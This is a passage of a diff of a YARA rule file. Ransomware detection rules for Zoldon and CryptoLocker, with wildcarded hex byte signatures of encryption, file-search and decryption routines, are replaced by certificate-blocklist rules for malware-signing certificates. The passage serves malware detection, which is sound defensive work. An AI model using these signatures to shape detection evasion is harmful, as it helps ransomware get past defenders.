"https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Zoldon.yara#L1-L107" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "4821b8506e7ba00987978f2744da1c532e03d73f3275cb15e39cdf87f6018223" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L13168-L13184" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "d42d40ca381b99b68a3384cecf585aab2acca66d4e13503d337b1605d587d0b5" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Zoldon" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $main_encrypt_function_p1 = { - 55 8B EC 81 C4 ?? ?? ?? ?? 33 C9 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? - ?? 89 8D ?? ?? ?? ?? 89 4D ?? 89 8D ?? ?? ?? ?? 89 4D ?? 89 4D ?? 89 55 ?? 89 45 ?? - 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 - 64 89 20 E8 ?? ?? ?? ?? DD 5D ?? 9B 8B 45 ?? 89 45 ?? 8B 45 ?? 89 45 ?? FF 75 ?? FF - 75 ?? 8D 55 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ?? ?? B2 ?? - A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? B1 ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? - 3C ?? 0F 85 ?? ?? ?? ?? B0 ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? - 84 C0 0F 85 ?? ?? ?? ?? 8B 4D ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? C6 - 80 ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? - ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 66 C7 45 - } - $main_encrypt_function_p2 = { - 8D 85 ?? ?? ?? ?? 66 8B 55 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? B9 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? 66 83 7D - ?? ?? 74 ?? 8D 85 ?? ?? ?? ?? 66 8B 55 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? - ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 66 FF 45 ?? 66 83 7D - ?? ?? 75 ?? 8B 4D ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? - 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? - ?? ?? 8B 95 ?? ?? ?? ?? 33 C9 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 - ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? - ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? - E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? - ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59 - 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? - ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? - E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3 - } - $write_zoldon_regkey = { - 55 8B EC 83 C4 ?? 53 56 33 DB 89 5D ?? 88 4D ?? 8B DA 8B F0 33 C0 55 68 ?? ?? ?? ?? - 64 FF 30 64 89 20 8D 45 ?? 8B D3 E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B D8 84 DB - 75 ?? 8D 45 ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 89 45 ?? 80 7D ?? - ?? 74 ?? 83 7D ?? ?? 75 ?? 8D 45 ?? 50 8B 46 ?? 50 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 - 8B D3 8B C6 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B D0 8B C6 E8 ?? ?? ?? ?? 88 45 ?? EB - ?? 8D 45 ?? 50 8D 45 ?? 50 6A ?? 8B 46 ?? 50 6A ?? 6A ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? - ?? 50 8B D3 8B C6 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B D0 8B C6 E8 ?? ?? ?? ?? 88 45 - ?? 80 7D ?? ?? 74 ?? 83 7E ?? ?? 0F 95 C0 84 D8 74 ?? FF 76 ?? 68 ?? ?? ?? ?? FF 75 - ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 8B C6 E8 ?? ?? ?? ?? 33 - C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3 - } - $find_files_p1 = { - 55 8B EC 81 C4 ?? ?? ?? ?? 33 C9 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? - ?? 89 8D ?? ?? ?? ?? 89 4D ?? 89 4D ?? 89 4D ?? 89 4D ?? 89 4D ?? 89 4D ?? 89 55 ?? - 89 45 ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? - 64 FF 30 64 89 20 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? - ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33 - C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 F6 85 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 - ?? 80 B8 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 - ?? ?? ?? ?? 85 C0 75 ?? B9 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 - 74 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? - ?? ?? ?? 64 FF 30 64 89 20 8D 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 - 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? 8B - } - $find_files_p2 = { - 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? E9 - ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? B9 ?? - ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? E9 ?? ?? - ?? ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D - 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? - ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? - ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? - BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? - 74 ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D - 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? - ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? - ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 85 C0 0F 84 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 - ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? - ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 8B E5 5D C3 - } - condition: - uint16(0)==0x5A4D and ($write_zoldon_regkey) and ( all of ($find_files_p*)) and ( all of ($main_encrypt_function_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Itgms Ltd" and pe.signatures[i].serial=="64:2a:d8:e5:ef:8b:3a:c7:67:f0:d5:c1:a9:99:bd:aa" and 1447804800<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Win32_Ransomware_Cryptolocker : TC_DETECTION MALICIOUS MALWARE FILE +rule REVERSINGLABS_Cert_Blocklist_5333D3079D8Afda715703775E1389991 : INFO FILE { meta: - description = "Yara rule that detects CryptoLocker ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "8cc3ac4b-9179-5e2c-97e1-65304f9dfe22" - date = "2020-07-15" - modified = "2020-07-15" + id = "4db299c6-5be9-5900-a944-07a0a41920a4" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.CryptoLocker.yara#L3-L154" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "08430b0c5689840d592bdda5dbc2ed06e0d0fa1e2c0f19aff4316580c6a0b23d" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L13186-L13202" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "98bd9d35c4e196a11943826115ab495833f7ef1d95f9736cc24255d6dd4fd21c" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "CryptoLocker" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $file_loop_1 = { - 55 8B EC 83 EC ?? 53 56 8B D9 57 89 5D ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 32 C9 83 7D ?? ?? 88 4D ?? 0F 86 45 01 - 00 00 8B 5D ?? 0F 57 C0 66 0F 13 45 ?? 84 C9 74 08 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? FF 75 ?? FF 75 ?? FF 33 FF 15 ?? - ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 FF 33 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 8B 75 ?? - 6A ?? 8B 49 ?? 6A ?? 52 56 8B 01 6A ?? 89 55 ?? 8B 00 FF D0 84 C0 0F 84 E6 00 00 00 FF 15 ?? ?? ?? ?? 8B 7D ?? 33 D2 89 - 45 ?? 8B D8 85 FF 72 18 77 08 81 FE ?? ?? ?? ?? 76 0E B8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB 05 8B C6 89 7D ?? 3B D0 73 - 0F 8B 45 ?? 8D 0C 13 8B 40 ?? 88 0C 02 42 EB CC 8B 5D ?? 85 FF 8B FE 75 04 85 F6 74 6B 85 DB 77 0E 72 08 81 FF ?? ?? ?? - ?? 73 04 8B F7 EB 05 BE ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8B 45 ?? 56 FF 70 ?? 8B 45 ?? FF 30 FF 15 ?? ?? ?? ?? 85 C0 74 ?? - 39 75 ?? 75 ?? 8B 45 ?? 2B FE 8B 55 ?? 83 DB ?? 2B D7 8B 48 ?? 8B 45 ?? 1B C3 50 8B 31 52 FF 75 ?? FF 75 ?? 8B 06 6A ?? - FF D0 84 C0 74 34 85 DB 77 AD 72 04 85 FF 75 95 8B 5D ?? FF 33 FF 15 ?? ?? ?? ?? 8A 4D ?? FE C1 0F B6 C1 88 4D ?? 3B 45 - ?? 0F 82 C6 FE FF FF B0 ?? 5F 5E 5B 8B E5 5D C2 - } - $file_loop_2 = { - 55 8B EC 83 EC ?? 53 56 8B D9 57 89 5D ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 32 C9 83 7D ?? ?? 88 4D ?? 0F 86 50 01 - 00 00 8B 5D ?? 0F 57 C0 66 0F 13 45 ?? 84 C9 74 08 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? FF 75 ?? FF 75 ?? FF 33 FF 15 ?? - ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 FF 33 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 8B 49 ?? - 8B 75 ?? 8B 01 6A ?? 8B 00 6A ?? 52 56 6A ?? 89 55 ?? FF D0 84 C0 0F 84 F1 00 00 00 FF 15 ?? ?? ?? ?? 8B 7D ?? 89 45 ?? - 33 D2 8B D8 85 FF 72 18 77 08 81 FE ?? ?? ?? ?? 76 0E B8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB 05 8B C6 89 7D ?? 3B D0 73 - 10 8B 45 ?? 8D 0C 13 8B 40 ?? 42 88 4C 02 ?? EB CB 8B 5D ?? 85 FF 8B FE 75 04 85 F6 74 75 85 DB 77 11 72 08 81 FF ?? ?? - ?? ?? 73 07 8B F7 89 5D ?? EB 0C BE ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8B 45 ?? 56 FF 70 ?? 8B 45 ?? FF - 30 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 39 75 ?? 75 ?? 8B 45 ?? 8B 55 ?? 8B 48 ?? 8B 45 ?? 2B FE 8B 31 83 DB ?? 2B D7 1B C3 50 - 8B 06 52 FF 75 ?? FF 75 ?? 6A ?? FF D0 84 C0 74 34 85 DB 77 A6 72 04 85 FF 75 8B 8B 5D ?? FF 33 FF 15 ?? ?? ?? ?? 8A 4D - ?? FE C1 0F B6 C1 88 4D ?? 3B 45 ?? 0F 82 BB FE FF FF B0 ?? 5F 5E 5B 8B E5 5D C2 - } - $file_loop_3 = { - 55 8B EC 83 EC ?? 53 56 8B C1 57 89 45 ?? E8 ?? ?? ?? ?? 84 C0 0F 84 62 01 00 00 8B 5D ?? 32 C0 0F 57 C0 88 45 ?? 66 0F - 13 45 ?? EB 03 8D 49 ?? 84 C0 74 08 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? FF 75 ?? FF 75 ?? FF 33 FF 15 ?? ?? ?? ?? 85 C0 - 0F 84 27 01 00 00 8D 45 ?? 50 FF 33 FF 15 ?? ?? ?? ?? 85 C0 0F 84 13 01 00 00 8B 4D ?? 8B 55 ?? 8B 49 ?? 8B 75 ?? 8B 01 - 6A ?? 8B 00 6A ?? 52 56 6A ?? 89 55 ?? FF D0 84 C0 0F 84 EE 00 00 00 FF 15 ?? ?? ?? ?? 8B 7D ?? 89 45 ?? 33 D2 8B D8 90 - 85 FF 72 18 77 08 81 FE ?? ?? ?? ?? 76 0E B8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB 05 8B C6 89 7D ?? 3B D0 73 10 8B 45 ?? - 8D 0C 13 8B 40 ?? 42 88 4C 02 ?? EB CB 8B 5D ?? 85 FF 8B FE 75 04 85 F6 74 75 85 DB 77 11 72 08 81 FF ?? ?? ?? ?? 73 07 - 8B F7 89 5D ?? EB 0C BE ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8B 45 ?? 56 FF 70 ?? 8B 45 ?? FF 30 FF 15 ?? - ?? ?? ?? 85 C0 74 5E 39 75 ?? 75 59 8B 45 ?? 8B 55 ?? 8B 48 ?? 8B 45 ?? 2B FE 8B 31 83 DB ?? 2B D7 1B C3 50 8B 06 52 FF - 75 ?? FF 75 ?? 6A ?? FF D0 84 C0 74 30 85 DB 77 A6 72 04 85 FF 75 8B 8B 5D ?? FF 33 FF 15 ?? ?? ?? ?? 8A 45 ?? FE C0 88 - 45 ?? 3C ?? 0F 82 BE FE FF FF B0 ?? 5F 5E 5B 8B E5 5D C2 - } - $encrypt_data_1 = { - 55 8B EC 56 8B 75 ?? 57 8B F9 39 75 ?? 73 09 5F 83 C8 ?? 5E 5D C2 ?? ?? 8B 07 53 85 C0 74 58 48 83 F8 ?? 77 48 8B 5D ?? - 8B 45 ?? 3B D8 74 0B 56 50 53 E8 ?? ?? ?? ?? 83 C4 ?? FF 75 ?? 8D 45 ?? 89 75 ?? 50 8B 45 ?? 53 6A ?? 0F B6 C0 50 6A ?? - FF 77 ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 83 CA ?? 85 C0 5B 0F 44 CA 5F 8B C1 5E 5D C2 ?? ?? 5B 5F 83 C8 ?? 5E 5D C2 ?? ?? 8B - 47 ?? 33 D2 89 45 ?? 8B 47 ?? 85 F6 74 26 8B 7D ?? 8B DE 8B 4D ?? 8B F0 2B F9 8A 04 0F 8D 49 ?? 32 04 32 88 41 ?? 8D 42 - ?? 33 D2 F7 75 ?? 4B 75 E9 8B 75 ?? 5B 5F 8B C6 5E 5D C2 - } - $encrypt_data_2 = { - 55 8B EC 56 8B 75 ?? 57 8B F9 39 75 ?? 73 09 5F 83 C8 ?? 5E 5D C2 ?? ?? 8B 07 53 85 C0 74 56 48 83 F8 ?? 77 46 8B 5D ?? - 8B 45 ?? 3B D8 74 0B 56 50 53 E8 ?? ?? ?? ?? 83 C4 ?? FF 75 ?? 8D 45 ?? 50 0F B6 45 ?? 53 6A ?? 50 6A ?? FF 77 ?? 89 75 - ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 83 CA ?? 85 C0 5B 0F 44 CA 5F 8B C1 5E 5D C2 ?? ?? 5B 5F 83 C8 ?? 5E 5D C2 ?? ?? 8B 47 ?? - 33 D2 89 45 ?? 8B 47 ?? 85 F6 74 26 8B 4D ?? 8B 7D ?? 8B DE 2B F9 8B F0 8A 04 0F 32 04 32 8D 49 ?? 88 41 ?? 8D 42 ?? 33 - D2 F7 75 ?? 4B 75 E9 8B 75 ?? 5B 5F 8B C6 5E 5D C2 - } - $encrypt_data_3 = { - 55 8B EC 53 56 8B 75 ?? 8B D9 39 75 ?? 72 4C 83 3B ?? 77 47 8B 45 ?? 57 8B 7D ?? 3B F8 74 0B 56 50 57 E8 ?? ?? ?? ?? 83 - C4 ?? FF 75 ?? 8D 45 ?? 50 0F B6 45 ?? 57 6A ?? 50 6A ?? FF 73 ?? 89 75 ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 83 CA ?? 85 C0 5F - 0F 44 CA 5E 8B C1 5B 5D C2 ?? ?? 5E 83 C8 ?? 5B 5D C2 - } - $decrypt_data_1 = { - 55 8B EC 53 56 57 8B F9 8B 07 85 C0 74 53 48 83 F8 ?? 77 55 8B 75 ?? 39 75 ?? 72 4D 8B 5D ?? 8B 45 ?? 3B D8 74 0B 56 50 - 53 E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 89 75 ?? 50 8B 45 ?? 53 6A ?? 0F B6 C0 50 6A ?? FF 77 ?? FF 15 ?? ?? ?? ?? 8B 4D ?? - 83 CA ?? 85 C0 5F 0F 44 CA 5E 8B C1 5B 5D C2 ?? ?? 8B 75 ?? 39 75 ?? 73 0A 5F 5E 83 C8 ?? 5B 5D C2 ?? ?? 8B 47 ?? 33 D2 - 89 45 ?? 8B 47 ?? 85 F6 74 28 8B 7D ?? 8B DE 8B 4D ?? 8B F0 2B F9 8B FF 8A 04 0F 8D 49 ?? 32 04 32 88 41 ?? 8D 42 ?? 33 - D2 F7 75 ?? 4B 75 E9 8B 75 ?? 5F 8B C6 5E 5B 5D C2 - } - $decrypt_data_2 = { - 55 8B EC 53 56 57 8B F9 8B 07 85 C0 74 51 48 83 F8 ?? 77 53 8B 75 ?? 39 75 ?? 72 4B 8B 5D ?? 8B 45 ?? 3B D8 74 0B 56 50 - 53 E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 50 0F B6 45 ?? 53 6A ?? 50 6A ?? FF 77 ?? 89 75 ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 83 CA - ?? 85 C0 5F 0F 44 CA 5E 8B C1 5B 5D C2 ?? ?? 8B 75 ?? 39 75 ?? 73 0A 5F 5E 83 C8 ?? 5B 5D C2 ?? ?? 8B 47 ?? 33 D2 89 45 - ?? 8B 47 ?? 85 F6 74 2A 8B 4D ?? 8B 7D ?? 8B DE 2B F9 8B F0 8D 64 24 ?? 8A 04 0F 32 04 32 8D 49 ?? 88 41 ?? 8D 42 ?? 33 - D2 F7 75 ?? 4B 75 E9 8B 75 ?? 5F 8B C6 5E 5B 5D C2 - } - $decrypt_data_3 = { - 55 8B EC 53 8B D9 83 3B ?? 77 56 56 8B 75 ?? 39 75 ?? 73 09 5E 83 C8 ?? 5B 5D C2 ?? ?? 8B 45 ?? 57 8B 7D ?? 3B F8 74 0B - 56 50 57 E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 50 0F B6 45 ?? 57 6A ?? 50 6A ?? FF 73 ?? 89 75 ?? FF 15 ?? ?? ?? ?? 8B 4D ?? - 83 CA ?? 85 C0 5F 0F 44 CA 5E 8B C1 5B 5D C2 ?? ?? 83 C8 ?? 5B 5D C2 - } - $decrypt_strings_1 = { - 55 8B EC 53 56 8B D9 8B F2 57 33 C9 33 FF 2B DE 8B 45 ?? 8D 14 31 8A 04 07 02 C1 32 04 13 88 02 8D 47 ?? 33 D2 F7 75 ?? - 8B FA F6 C1 ?? 75 0B 8B C1 D1 E8 66 83 3C 46 ?? 74 03 41 EB D3 D1 E9 5F 5E 5B 8D 41 ?? 5D C3 - } - $decrypt_strings_2 = { - 55 8B EC 53 56 8B D9 57 8B F2 33 C9 33 FF 2B DE 8B 45 ?? 8D 14 31 8A 04 07 02 C1 32 04 13 88 02 8D 47 ?? 33 D2 F7 75 ?? - 8B FA F6 C1 ?? 75 0B 8B C1 D1 E8 66 83 3C 46 ?? 74 03 41 EB D3 5F D1 E9 5E 8D 41 ?? 5B 5D C3 - } - $decrypt_1 = { - A1 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 8C B7 00 00 00 33 D2 8B 0C 95 ?? ?? ?? ?? 33 0C 95 ?? ?? ?? ?? 81 E1 ?? ?? ?? ?? 33 0C - 95 ?? ?? ?? ?? 8B C1 D1 E9 83 E0 ?? 33 0C 85 ?? ?? ?? ?? 33 0C 95 ?? ?? ?? ?? 89 0C 95 ?? ?? ?? ?? 42 81 FA ?? ?? ?? ?? - 7C C0 81 FA ?? ?? ?? ?? 7D 39 56 8D 34 95 ?? ?? ?? ?? 8B 0E 33 4E ?? 81 E1 ?? ?? ?? ?? 33 0E 8B C1 D1 E9 83 E0 ?? 8B 04 - 85 ?? ?? ?? ?? 33 86 ?? ?? ?? ?? 33 C1 89 06 83 C6 ?? 81 FE ?? ?? ?? ?? 7C D0 5E 8B 0D ?? ?? ?? ?? 33 0D ?? ?? ?? ?? 81 - E1 ?? ?? ?? ?? 33 0D ?? ?? ?? ?? 8B C1 D1 E9 83 E0 ?? 33 0C 85 ?? ?? ?? ?? 33 0D ?? ?? ?? ?? 33 C0 89 0D ?? ?? ?? ?? 8B - 0C 85 ?? ?? ?? ?? 40 A3 ?? ?? ?? ?? 8B C1 C1 E8 ?? 33 C8 8B C1 25 ?? ?? ?? ?? C1 E0 ?? 33 C8 8B C1 25 ?? ?? ?? ?? C1 E0 - ?? 33 C8 8B C1 C1 E8 ?? 33 C1 C3 - } - $decrypt_2 = { - A1 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 8C C7 00 00 00 33 D2 EB 0C 8D A4 24 ?? ?? ?? ?? EB 03 8D 49 ?? 8B 0C 95 ?? ?? ?? ?? 33 - 0C 95 ?? ?? ?? ?? 42 81 E1 ?? ?? ?? ?? 33 0C 95 ?? ?? ?? ?? 8B C1 83 E0 ?? D1 E9 33 0C 85 ?? ?? ?? ?? 33 0C 95 ?? ?? ?? - ?? 89 0C 95 ?? ?? ?? ?? 81 FA ?? ?? ?? ?? 7C C0 81 FA ?? ?? ?? ?? 7D 3B 56 8D 34 95 ?? ?? ?? ?? 8B 0E 33 4E ?? 83 C6 ?? - 81 E1 ?? ?? ?? ?? 33 4E ?? 8B C1 83 E0 ?? D1 E9 8B 04 85 ?? ?? ?? ?? 33 86 ?? ?? ?? ?? 33 C1 89 46 ?? 81 FE ?? ?? ?? ?? - 7C CE 5E 8B 0D ?? ?? ?? ?? 33 0D ?? ?? ?? ?? 81 E1 ?? ?? ?? ?? 33 0D ?? ?? ?? ?? 8B C1 83 E0 ?? D1 E9 33 0C 85 ?? ?? ?? - ?? 33 0D ?? ?? ?? ?? 33 C0 89 0D ?? ?? ?? ?? 8B 0C 85 ?? ?? ?? ?? 40 A3 ?? ?? ?? ?? 8B C1 C1 E8 ?? 33 C8 8B C1 25 ?? ?? - ?? ?? C1 E0 ?? 33 C8 8B C1 25 ?? ?? ?? ?? C1 E0 ?? 33 C8 8B C1 C1 E8 ?? 33 C1 C3 - } - $decrypt_3 = { - A1 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 8C C7 00 00 00 33 D2 EB 0C 8D A4 24 ?? ?? ?? ?? EB 03 8D 49 ?? 8B 0C 95 ?? ?? ?? ?? 33 - 0C 95 ?? ?? ?? ?? 42 81 E1 ?? ?? ?? ?? 33 0C 95 ?? ?? ?? ?? 8B C1 83 E0 ?? D1 E9 33 0C 85 ?? ?? ?? ?? 33 0C 95 ?? ?? ?? - ?? 89 0C 95 ?? ?? ?? ?? 81 FA ?? ?? ?? ?? 7C C0 81 FA ?? ?? ?? ?? 7D 3B 56 8D 34 95 ?? ?? ?? ?? 8B 0E 33 4E ?? 83 C6 ?? - 81 E1 ?? ?? ?? ?? 33 4E ?? 8B C1 83 E0 ?? D1 E9 8B 04 85 ?? ?? ?? ?? 33 86 ?? ?? ?? ?? 33 C1 89 46 ?? 81 FE ?? ?? ?? ?? - 7C CE 5E 8B 0D ?? ?? ?? ?? 33 0D ?? ?? ?? ?? 81 E1 ?? ?? ?? ?? 33 0D ?? ?? ?? ?? 8B C1 83 E0 ?? D1 E9 33 0C 85 ?? ?? ?? - ?? 33 0D ?? ?? ?? ?? 33 C0 89 0D ?? ?? ?? ?? 8B 0C 85 ?? ?? ?? ?? 40 A3 ?? ?? ?? ?? 8B 